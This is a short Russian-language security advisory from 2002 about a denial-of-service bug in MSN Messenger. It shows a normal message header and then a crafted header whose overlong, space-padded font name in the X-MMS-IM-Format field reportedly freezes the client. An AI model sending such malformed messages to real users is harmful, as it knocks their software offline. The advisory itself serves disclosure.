DoS против Msn Messenger

Дата публикации:
08.05.2002
Всего просмотров:
801
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Msn Messenger - популярный интернет пейджер от Microsoft. Клиент зависает при получении некорректного описания шрифта в заголовке мгновенного сообщения.

Клиент Msn Messenger посылает заголовок с каждым сообщением. Заголовок содержит информацию о шрифте, цвете сообщения и т.п.

Обычно заголовок выглядит следующим образом:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0;
PF=22
hey friend, how are you?
<end>


Теперь создаем заголовок с длинным именем шрифта:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0;
PF=22
hey friend, how are you?
<end>


Это сообщение вызовет зависания клиента Msn Messenger
 



Ссылки: Misformated message header causes msn messenger to crash
или введите имя

CAPTCHA